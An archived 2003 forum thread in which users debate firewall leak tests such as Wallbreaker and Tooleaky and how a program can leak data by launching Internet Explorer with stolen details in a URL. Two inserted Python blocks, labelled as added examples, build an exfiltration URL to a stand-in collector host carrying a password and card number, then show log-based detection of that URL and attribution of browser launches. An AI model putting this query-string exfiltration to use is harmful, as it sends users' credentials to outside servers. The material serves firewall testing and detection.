Opinions about pcInternet Patrol 2.0 Firewall!

Discussion in 'other firewalls' started by Firefighter, Jun 19, 2003.

Thread Status:
Not open for further replies.
  1. DavidH

    DavidH Registered Member

    Joined:
    Nov 1, 2002
    Posts:
    42
    Location:
    Fort Worth, TX USA

    Hi,

    gkweb, I understand what you are saying. There is a school of thought that says that the firewall should be configured to handle all possibilities in the universe by default. Actually, I really do not subscribe to that philosophy. For experts it is fine. For beginners, it is not. And, except for e-mail, which should be covered by an anti-virus, I have a hard time understanding where someone would pick up a trojan or virus so bad that it contains one of the more advanced firewall-defeating algorithms. There must be a compromise between usability and security, especially for beginners. The advanced configuration should be left to the experts. And, in my opinion, Outpost is as capable as any to handle the majority, if not all, of the "real" threats out there. However, that does depend on the user, their skill, and their experience.

    _anvil, I had the browser open and a download manager running constantly while running PC Audit and Wall Breaker. The PLAIN and SIMPLE fact is that Wall Breaker could not load the web page and PC Audit consistently told me that "My PC is well protected", and I got NO e-mail. I am not sure how I could have possibly given these leak tests a better chance. They simply failed to bypass Outpost. And believe me, if they did penetrate Outpost and my configuration, I would be the FIRST to give Agnitum notice, as I have done many times in the past. If any leak test that I have confirmed fails to penetrate OP2 (as described in the thread I linked) does penetrate OP2 on some user's system, then it is simply misconfigured. In most cases, if someone insists that OP2 pass the tests, we will instruct them on how to set up their firewall in the forum.

    In general, I will admit that the auto-configured setting leaves a little bit to be desired. But then, anybody wanting to pass sophisticated leak tests should know better than to EVER let auto-configuration take place in any firewall.
     
  2. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège

    Hi gkweb,

    It's up to you of course, but the first thing I do when configuring any FW is disallowing Explorer any access to the W3: it has no reason to be considered a web browser.
    On non-NT OSes, it must sometimes be partially allowed.
    With OP, if you put any app among the trusted applications, OP has no control at all over this app.

    I don't remember for sure, but I think no app is in the trusted apps by default.

    It's not really the right terminology to say "maximum security settings" if you introduce a weakness yourself with what I would consider a purposely bad configuration, but I understand your point ;)

    Rgds,
     
  3. gkweb

    gkweb Guest

    To sum up, I never said that a firewall should block all threats by default; I'm not from that school. I'm only interested in the detection engine's capability, in what it can see.
    For me it's an important security component by itself, and afterwards, only afterwards, when I know the weaknesses of this engine, I add improvements to cover them.
    Some don't care about its real capability; some are only interested in whether all their security measures leak or not, and often the answer is no.
    Me, I'm interested in details; those who share this can see the information that I give.

    You talked about beginners, that there would be a compromise between security and usability, and this is exactly what I want to show.
    A beginner doesn't know how to set up his firewall, so the stronger his personal firewall's detection strength, the better his security will be.

    But this is a security component that is not a priority for everyone; it is for me.

    @JacK
    Put IE fully trusted and run "Tooleaky": OP2 will block it because it has control over it.
    Try Look'n'Stop, fully trust IE, run Tooleaky, and again it is blocked because it has control over it.

    regards,

    gkweb.
     
  4. _anvil

    _anvil Registered Member

    Joined:
    Jun 18, 2003
    Posts:
    56
    @DavidH

    Hmm, the only application rule, I had set up was:
    'iexplore.exe, TCP out, port 80: allow'
    No change of global rules, component control 'normal.'
    Is that 'misconfigured'? ;)

    When you tested: did OP2 show an alert pop-up? If yes, what was the message? If not, what did the log say (the reason for blocking the leaktest should be logged)?

    What OS do you use? I use WinXP.


    @gkweb

    Nicely explained, I've the same thoughts about leaktests as you. :)
    I also like to go into details, and not just:
    'click -> leaktest blocked -> "hooray"'
    or
    'click -> leaktest not blocked -> :'( ' ;)
     
  5. gkweb

    gkweb Guest

    lol anvil :D

    a far better sum-up than mine, congratulations ;)

    regards,

    gkweb.

    EDIT : when you talk about Wallbreaker, say which test: the first (explorer trick) or the second (launch only IE).
     
  6. DavidH

    DavidH Registered Member

    Joined:
    Nov 1, 2002
    Posts:
    42
    Location:
    Fort Worth, TX USA

    _anvil and gkweb.....as far as PC Audit is concerned, I have not had a problem. As for Wall Breaker...I was confused by the Wall Breaker test and mistakenly kept pressing "yes". After I read the directions :rolleyes:, I managed to execute the second test for Wall Breaker and OP2 did indeed fail. The mistake was mine. I am sorry about that.

    I am curious about a couple of things though. All the second test seems to do is open a browser and load a web page. Is this really a leak? I have not captured any packets, but I assume all that was sent was a SYN packet to TCP port 80 on the site your leaktest prescribed. And, since port 80 is normally allowed for IE, the page loaded nicely. :p I am just wondering if substantial data can really be transported this way. After all, it was an outbound connection that was established and it was only a request to load a web site, as far as I know. Perhaps UDP can be used to export data. But, in that case there would have been an alert since IE is not allowed to use UDP on my system.

    At any rate, I learned at least one thing here today. I should make more of an effort to read the instructions rather than assuming how something works. I will make the appropriate corrections to the Leak Test link. Thanks. :)

    I have to go now, but I do look forward to any insight regarding the questions I posted in this thread. Have a good day. :)
     
  7. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège

    Hello gkweb,

    I did not try and shall not ;)
    I never put any app fully trusted with any FW: maybe it would pass leaktests with flying colours, but it is nevertheless totally insecure anyway ;)
    Leaktests give a hint about FWs' abilities, that's all. They could even give a false sense of security to newbies. Only useful for advanced users, or at least those involved with their own security, IMHO.

    Cheers,
     
  8. _anvil

    _anvil Registered Member

    Joined:
    Jun 18, 2003
    Posts:
    56
    @DavidH

    No prob. :)
    The leak which Wallbreaker shows is quite simple and basically the same as in Tooleaky. It can (only) be used to transfer personal data (passwords, credit card numbers, ...) to a foreign, 'evil' web server. The personal data is a part of the URL which your browser connects to
    (http://perso.wanadoo.fr/jugesoftware/doyouleak.html?PERSONALINFORMATION+CREDITCARDNUMBER+PASSWORDS+MAILACCOUNT.) The webserver just receives the URL, and reads the personal data in it. This connection is initiated by Wallbreaker.
    The test would be passed by your firewall if it detects that it is wallbreaker.exe which originally initiated the connection. But in both Wallbreaker tests, most (all?) firewalls fail to see this...

    Sorry for insisting: _how_ does OP2 pass pcAudit (normal component control) and Wallbreaker-Test 1 on your machine? Does OP2 alert you? What do the logs say?
    It's for my own peace of mind... ;)
     
  9. gkweb

    gkweb Guest

    Good thing, now we know that WB bypasses OP2 (for example, but LnS too, and all the others tested).
    Now, time to answer "is this a leak?" :)

    Yes, it is! You may not have noticed that the URL called was:

    http://perso.wanadoo.fr/jugesoftware/doyouleak.html?PERSONALINFORMATION+CREDITCARDNUMBER+PASSWORDS+MAILACCOUNT

    How to transmit information? The web page just has to be a PHP one instead of HTML, and then after the "?" I just have to transmit like this:

    http://url/page.php?variable=personalinfos

    Behind this I can have an SQL database which can record any information sent...
    This idea about "how to transmit" was first shown by Tooleaky, which also sent information by launching IE, but Tooleaky is blocked by most firewalls nowadays; WB uses another trick ;)

    At the end, about advanced information transmission by this method, I copy/paste what the Tooleaky leaktest author said:

    But it could be very simple that the trojan uses a keylogger feature, and as soon as a credit card number is detected, sends it to the remote page.

    So yes, I think that this leak could seriously hurt ;)

    If you launch IE yourself it's fine, but if it's another program that launches it, a serious leak can happen.

    regards,

    gkweb.
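The query-string channel described in the two posts above (_anvil's "the personal data is a part of the URL" and gkweb's page.php?variable=personalinfos), as an added example that is not part of this thread and is not Wallbreaker's, Tooleaky's or any firewall's code: the sending side packs values into the query string, the receiving page reads them straight back out, and a scan over proxy-style log lines flags URLs that look like this. The collector host, path and parameter names and the log lines are made up for the example; the Luhn check and the length threshold are my own choice of what to look for, not something the thread proposes.

```python
"""URL query-string exfiltration and a log-side check for it.

Added example for this thread; not code from Wallbreaker, Tooleaky or any
firewall. Host, path, parameter names and log lines are constructed.
"""
import re
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical collection page, in the shape of the thread's
# "http://url/page.php?variable=personalinfos".
COLLECTOR = "http://collector.example/page.php"


def build_exfil_url(base, fields):
    """Sender side: a program that can only 'open a URL in the browser' puts
    the stolen values into the query string. urlencode percent-escapes
    '@', spaces, '&' and so on, so any text survives the trip intact."""
    return base + "?" + urlencode(fields)


def collector_side(url):
    """Receiver side: the values come straight back out of the query string.
    A real page.php would write them into a database instead of returning them."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in query.items()}


def luhn_ok(digits):
    """Standard Luhn checksum; true for well-formed card numbers."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


DIGIT_RUN = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def suspicious_query(url, max_query_len=200):
    """Reasons one outbound URL deserves a look: a query string far longer than
    an ordinary page request, or a Luhn-valid 13-19 digit run inside any
    decoded parameter value (a card number in transit)."""
    parts = urlsplit(url)
    reasons = []
    if len(parts.query) > max_query_len:
        reasons.append("long query (%d chars)" % len(parts.query))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            compact = value.replace(" ", "").replace("-", "")
            if any(luhn_ok(m.group(0)) for m in DIGIT_RUN.finditer(compact)):
                reasons.append("Luhn-valid number in parameter '%s'" % name)
    return reasons


# Constructed proxy-style log: timestamp, client, process (when the proxy or
# firewall knows it), URL. The third line is what the leak looks like on the wire.
SAMPLE_LOG = """\
2003-06-20T10:01:02 10.0.0.5 iexplore.exe http://news.example/index.html
2003-06-20T10:01:09 10.0.0.5 iexplore.exe http://search.example/q?term=firewall+leaktest
2003-06-20T10:01:15 10.0.0.5 iexplore.exe http://collector.example/page.php?user=alice%40example.org&card=4111111111111111&pw=hunter2
"""


def scan_log(text):
    """Return (process, url, reasons) for every log line whose URL trips a check."""
    hits = []
    for line in text.splitlines():
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        reasons = suspicious_query(fields[3])
        if reasons:
            hits.append((fields[2], fields[3], reasons))
    return hits


if __name__ == "__main__":
    url = build_exfil_url(COLLECTOR, {"user": "alice@example.org",
                                      "card": "4111 1111 1111 1111", "pw": "hunter2"})
    print(url)
    print(collector_side(url))
    for process, hit_url, why in scan_log(SAMPLE_LOG):
        print(process, hit_url, why)
```

The point of the log scan is the one DavidH raises: a single SYN to port 80 from an allowed browser looks like any other page request to a packet-level rule, so the only place the leak is visible is in the URL itself. A real deployment would also want to look at the TLS/SNI case and at POST bodies, which this check does not cover.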
     
  10. gkweb

    gkweb Guest

    Someone discovered an interesting thing... hmm... a "terrific" thing.

    Indeed, if IE is already started, no matter that explorer.exe is blocked and IE has restricted rules (http 80, dns, etc...), WB uses the existing process; it doesn't launch another one, and then it goes through the firewall each time, for both tests.
    What's more terrific is that even SSM doesn't see it, because WB doesn't launch another app (if IE is closed, SSM sees it perfectly and warns you).

    So even if a firewall were able to block WB when IE is closed, when IE is already started the use of the existing process _seems_ to be unavoidable (I need your point of view!).
    If even SSM can't see Wallbreaker.exe access the process iexplore.exe, how could a firewall do it?

    Is there any way to see an executable accessing a process? Or even to lock a process to avoid such an exploit?

    gkweb.
     

    Attached Files:

    • sms.gif
      File size:
      34.4 KB
      Views:
      626
  11. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège

    Nite,

    Did you try it yourself?

    With IE open and/or Opera I get a warning
     

  12. _anvil

    _anvil Registered Member

    Joined:
    Jun 18, 2003
    Posts:
    56
    Yes, the same here... there is always a _new_ IE process started in both WB tests - no matter if there is already an IE process running. :p
     
  13. gkweb

    gkweb Guest

    :eek:

    Each time IE is started on my computer, WB uses it instead of creating a new one; what's going on o_O o_O

    I will investigate it more, but we are two against two: 2 computers that create a new process, and two that use the existing one...

    Meanwhile, it's very interesting news! Can you make a screenshot (or list here) of your running processes please? (And remind me what OS you have... hmm... XP for anvil ;))

    thanks.

    gkweb.

    EDIT : I meant to say "Windows services"
     
  14. DavidH

    DavidH Registered Member

    Joined:
    Nov 1, 2002
    Posts:
    42
    Location:
    Fort Worth, TX USA

    gkweb and _anvil,

    I just spent half an hour writing a more detailed response. However, I lost my connection and my post. I am unsure why. I will make this one short.

    gkweb, I have had similar results to yours with WB-Test1. I believe the problem with test 1 last night may have had more to do with the same sort of connection issues that I am experiencing today than with OP2's ability to block the test. I will do a little more testing and update the Leak Test info for Outpost appropriately.

    _anvil, in the case of PC Audit, I get a rule creation popup for explorer.exe and a component control popup for winlnet.dll. In each case I block, and PC Audit tells me that my system passes. I used a clean configuration with normal component control and also cleared out all of the old module information. Attached are the log entries which coincide with the prompts that I was given by Outpost when running PC Audit. If you would like any more info, let me know. :)

    Thanks....
     

  15. _anvil

    _anvil Registered Member

    Joined:
    Jun 18, 2003
    Posts:
    56
    @DavidH

    Hmm, on my machine there is no 'component control popup' on NORMAL level when testing pcAudit - only on MAXIMUM level... o_O
    Of course, winlnet.dll is not on the 'trusted' components list _before_ the tests with pcAudit - but _afterwards_ it is, without ever getting a 'component alert'... :p

    Normally OP2 should block this easily on NORMAL level, but it just doesn't (other leaktests with DLL injection _are_ blocked on NORMAL level).
    I'm testing on a freshly installed WinXP system, so there shouldn't be 'bad' influences.
    What is your OS again, DavidH?
     
  16. gkweb

    gkweb Guest

    Sorry to post between your posts, continue, but I really need to know how another IE process is started when IE is already started, when you try the second WB test...

    If I click twice on my IE icon on my desktop, I have two processes.
    If I launch it and then do the second WB test, the same process is used, whereas with you, anvil, another process is created; I need to know how :'(

    regards,

    gkweb.
     
  17. _anvil

    _anvil Registered Member

    Joined:
    Jun 18, 2003
    Posts:
    56
    LOL, it's exactly the contrary on my machine! :eek: :p

    Only the first Wallbreaker test uses an already running IE process - while in test 2, a second process is always started... o_O
     
  18. controler

    controler Guest

    Hi

    I have been reading this thread but am a bit confused about what is being said.
    Doesn't it appear that WB is using a HOOK and only kicks in with IE?
    If this is the case, you should see a different DLL loaded, shouldn't you?
    Or another call to a DLL?

    con
     
  19. gkweb

    gkweb Guest

    Hi

    WB doesn't "appear" to work one way or another to me, because I made WB, so I know how it works ;)
    WB doesn't use hooks or DLL injection; in the two tests it calls another executable, that's all.
    Afterwards, Windows seems to react differently on our computers, and I want to know why :eek:

    regards,

    gkweb.

    EDIT : I just tested on Win 2000 too, and the same process is used for both tests if IE is already started...
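_anvil's pass criterion (post 8: the firewall passes if it detects that it is wallbreaker.exe which originally initiated the connection), gkweb's question in post 10 (is there any way to see an executable driving an already-running iexplore.exe?) and the statement just above that WB simply calls another executable all come down to process ancestry. The following is an added example, not code from Wallbreaker, Outpost, SSM or Sysmon: it walks parent chains over hand-constructed process-creation and network-connection events (in the shape of Sysmon Event ID 1 and Event ID 3 records: Image, ParentImage, CommandLine, DestinationPort) to name the executable that originally set a browser in motion, and it reports separately the case where a browser that was already running makes the connection, because then no creation event exists to attribute it. The PIDs, the cmd.exe hop in the chain, the process names and the "interactive parent" list are assumptions made for the example, not a description of how Wallbreaker works.

```python
"""Which executable originally launched the browser?

Added example for this thread; not Wallbreaker, Outpost, SSM or Sysmon code.
The events below are constructed by hand in the shape of Sysmon Event ID 1
(process create: Image, ParentImage, CommandLine) and Event ID 3 (network
connect: Image, DestinationPort) records. PIDs and names are examples.
"""
from dataclasses import dataclass
from typing import Optional

BROWSERS = {"iexplore.exe", "opera.exe", "firefox.exe"}
# Assumption: a browser the user started arrives via the desktop shell.
INTERACTIVE_PARENTS = {"explorer.exe"}


@dataclass
class Event:
    kind: str                         # "create" or "connect"
    pid: int
    image: str
    parent_pid: Optional[int] = None  # create only
    parent_image: Optional[str] = None
    cmdline: str = ""                 # create only
    dest_port: Optional[int] = None   # connect only


def index_creations(events):
    """pid -> creation event, so ancestry can be walked without re-scanning."""
    return {e.pid: e for e in events if e.kind == "create"}


def ancestry(creations, pid):
    """Image names from the process upward, until a parent we have no record of."""
    chain, seen = [], set()
    cur = creations.get(pid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = creations.get(cur.parent_pid)
    return chain


def launchers_of(creations, pid):
    """Non-browser ancestors between the browser and the interactive shell,
    nearest first. Empty when explorer.exe started the browser itself; the
    last element is the executable that originally set things in motion."""
    chain = []
    for image in ancestry(creations, pid)[1:]:
        low = image.lower()
        if low in INTERACTIVE_PARENTS:
            break
        if low not in BROWSERS:       # browser -> browser child windows are fine
            chain.append(image)
    return chain


def unexpected_browser_launches(events):
    """Rule 1: a browser whose ancestry leads back to something other than the
    shell. This is the check the thread asks for: blame the originator, not
    the process that happens to hold the socket."""
    creations = index_creations(events)
    hits = []
    for e in events:
        if e.kind == "create" and e.image.lower() in BROWSERS:
            chain = launchers_of(creations, e.pid)
            if chain:
                hits.append((e.pid, chain[-1], e.cmdline))
    return hits


def unattributed_browser_connections(events):
    """Rule 2, the blind spot: a browser connection whose PID has no creation
    record in the window. Either the browser predates the log or, as in the
    thread, it was already open and something else handed it the URL. Ancestry
    says nothing here; report it so nobody reads 'iexplore.exe' as 'user clicked'."""
    creations = index_creations(events)
    return [(e.pid, e.image, e.dest_port) for e in events
            if e.kind == "connect" and e.image.lower() in BROWSERS
            and e.pid not in creations]


# Constructed sequence: a user-started IE, then a test program reaching IE
# through an intermediate cmd.exe, then a connection from an IE instance that
# was already open before the window began (no creation event for pid 1400).
EVENTS = [
    Event("create", 1000, "explorer.exe", 900, "userinit.exe"),
    Event("create", 1200, "iexplore.exe", 1000, "explorer.exe",
          cmdline='"iexplore.exe" http://news.example/'),
    Event("connect", 1200, "iexplore.exe", dest_port=80),
    Event("create", 1300, "wallbreaker.exe", 1000, "explorer.exe", cmdline="wallbreaker.exe"),
    Event("create", 1305, "cmd.exe", 1300, "wallbreaker.exe", cmdline="cmd.exe /c launch.bat"),
    Event("create", 1310, "iexplore.exe", 1305, "cmd.exe",
          cmdline='"iexplore.exe" http://collector.example/page.php?x=data'),
    Event("connect", 1310, "iexplore.exe", dest_port=80),
    Event("connect", 1400, "iexplore.exe", dest_port=80),
]

if __name__ == "__main__":
    for pid, who, cmd in unexpected_browser_launches(EVENTS):
        print("browser pid %d launched by %s: %s" % (pid, who, cmd))
    for pid, image, port in unattributed_browser_connections(EVENTS):
        print("pid %d (%s) -> port %d with no creation record" % (pid, image, port))
```

Rule 1 is what a firewall or a tool like SSM can do when a new browser process appears: the parent chain is there to read. Rule 2 is the honest answer to gkweb's question in the case where the browser is already running: a process-creation or parent-based check has nothing to look at, so whatever hands the URL to the existing browser (however that is done) has to be watched by some other means, and until it is, a connection from an already-open browser cannot be attributed to the user.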
     
  20. DavidH

    DavidH Registered Member

    Joined:
    Nov 1, 2002
    Posts:
    42
    Location:
    Fort Worth, TX USA

    Hi _anvil and gkweb,

    hmmmm. It is starting to look like we have three or four topics being discussed here. :)

    That is a curious situation. You might try to start with a new configuration by making that selection from the File Menu. I named mine 'leaktest'. I have made only one rule: TCP, Out, 80, Allow. Then, Exit and Shutdown Outpost and add a .bak extension to modules.ini and modules.0 in the Outpost installation directory. After all that is finished, restart Outpost and try the tests again. Hopefully you get the same results as I do. If not, it may be beneficial to generate some logs and forward them to Agnitum.

    Strange, at normal component control level, winlnet.dll is not on my trusted components list before or after PC Audit execution. It is difficult to say why Outpost is not alerting you of the new component as it does on my system.

    My OS is Windows XP Home with no customization made to the default running services and no substantial registry tweaks. My network consists of a cable connection through a Toshiba cable modem, an SMC wireless router, and then an SMC wireless ethernet card on my PC. The only running processes, other than system processes, are NOD32 AV and Outpost. If you need some specific information, let me know. If needed, I can send you my Outpost Config files, INI Files, and even a registry export for comparison. That might help us find out why you are getting different results.

    gkweb... Not knowing what is going on in general with WallBreaker at this point, I have changed the info regarding Outpost and Leak Tests to reflect that it fails both Wall Breaker tests. I do not want to take any chance that I am giving wrong information to a user. While the forum is no longer directly associated with Agnitum, many users still come there for support, and so it is important for our information to be as accurate as possible. This is an interesting and educational conversation for me and I will continue to follow it. If there are any tests or experiments that I can do on my end or request that Agnitum do, let me know. I am happy to help.

    Have a good day. :)
     
  21. gkweb

    gkweb Guest

    no way to make IE start another process when one exists :'(

    I think we are the first to see a new surprising discovery: the Windows OSes are mutating like a virus, it's a new kind of life!
    The Polymorphic COS (Clever Operating System) does what it wants; this is why mine doesn't want to launch another process!

    Sorry, I'm going mad I guess :doubt:

    gkweb.
     